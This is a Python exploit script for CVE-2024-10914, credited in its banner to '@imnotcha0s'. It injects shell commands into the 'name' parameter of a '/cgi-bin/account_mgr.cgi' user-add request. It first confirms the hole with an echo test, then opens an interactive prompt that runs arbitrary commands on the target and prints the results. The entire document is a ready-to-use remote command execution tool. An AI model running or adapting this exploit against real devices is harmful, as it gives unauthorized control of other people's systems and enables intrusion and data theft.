import requests import random import string import argparse from urllib3.exceptions import InsecureRequestWarning http = requests.Session() http.verify = False def print_banner(): print(""" _______ ________ ___ ____ ___ __ __ _______ ____ _____ __ / ____/ | / / ____/ |__ \\ / __ \\__ \\/ // / < / __ \\/ __ < / // / / / | | / / __/________/ // / / /_/ / // /_______/ / / / / /_/ / / // /_ / /___ | |/ / /__/_____/ __// /_/ / __/__ __/_____/ / /_/ /\\__, / /__ __/ \\____/ |___/_____/ /____/\\____/____/ /_/ /_/\\____//____/_/ /_/ Coded by: @imnotcha0s """) def verify(url, ignore_cert): print("[!] Checking if target is vulnerable...") verify_string = "".join(random.choice(string.ascii_letters) for _ in range(5)) cmd = f"echo {verify_string}" endpoint = f"/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{cmd};%27" res = http.get(url+endpoint, verify=(not ignore_cert)) if verify_string in res.text: print("[+] Vulnerable") else: print("[-] Not vulnerable\n[-] exiting...") exit(0) def exploit(url, ignore_cert): while True: try: cmd = input("$ ") endpoint = f"/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{cmd};%27" res = http.get(url+endpoint, verify=(not ignore_cert)) print(res.text) except KeyboardInterrupt: exit(0) if __name__ == "__main__": parser = argparse.ArgumentParser(description="Exploit for CVE-2024-10914") parser.add_argument("-u", "--url", help="target url", required=True) parser.add_argument("-k", "--ignore-cert", help="Ignores ssl cert", default=False) args = parser.parse_args() print_banner() verify(args.url, args.ignore_cert) if (input("[?] Do you want to procceed with the exploit? [y/n]: ").lower() == "y"): exploit(args.url, args.ignore_cert) else: print("[!] Bye...")